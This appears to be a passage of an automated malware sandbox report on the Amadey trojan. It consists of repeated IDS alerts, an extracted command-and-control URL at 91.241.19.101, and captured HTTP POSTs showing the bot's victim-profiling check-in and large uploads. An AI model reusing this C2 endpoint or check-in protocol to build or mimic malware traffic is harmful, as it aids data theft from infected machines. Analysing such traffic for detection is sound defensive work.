          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50057 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50058 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50060 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50061 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50062 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50063 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50065 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50066 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50068 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50069 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50071 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50072 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50074 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50075 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50076 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50078 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50079 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50081 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50082 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50083 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50085 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50086 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50088 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50089 -> 91.241.19.101:80
          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:50090 -> 91.241.19.101:80
          Uses ping.exe to check the status of other devices and networksShow sources
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 2 -w 1000 127.0.0.1
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: 91.241.19.101/g7vcSfkbDs2/index.php
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----a925bc230fdbeec72a266ea97d6eb24eHost: 91.241.19.101Content-Length: 86299Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----a925bc230fdbeec72a266ea97d6eb24eHost: 91.241.19.101Content-Length: 86299Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----a925bc230fdbeec72a266ea97d6eb24eHost: 91.241.19.101Content-Length: 86299Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----a925bc230fdbeec72a266ea97d6eb24eHost: 91.241.19.101Content-Length: 86299Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----a925bc230fdbeec72a266ea97d6eb24eHost: 91.241.19.101Content-Length: 86299Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----a925bc230fdbeec72a266ea97d6eb24eHost: 91.241.19.101Content-Length: 86299Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----c9932e640ba65e6431bee773009921f9Host: 91.241.19.101Content-Length: 92984Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----85e8c95abb4d0498d71f1d5dacd6f5e6Host: 91.241.19.101Content-Length: 93053Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----85e8c95abb4d0498d71f1d5dacd6f5e6Host: 91.241.19.101Content-Length: 93053Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----c9932e640ba65e6431bee773009921f9Host: 91.241.19.101Content-Length: 92984Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----c9932e640ba65e6431bee773009921f9Host: 91.241.19.101Content-Length: 92984Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----59b874e05f47d8f295c63e0ed2578125Host: 91.241.19.101Content-Length: 95478Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0ba936dc8818d7343b7ef1ae30c6903bHost: 91.241.19.101Content-Length: 94387Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0ba936dc8818d7343b7ef1ae30c6903bHost: 91.241.19.101Content-Length: 94387Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----f829aff7373c846bd704df066d49d369Host: 91.241.19.101Content-Length: 94389Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
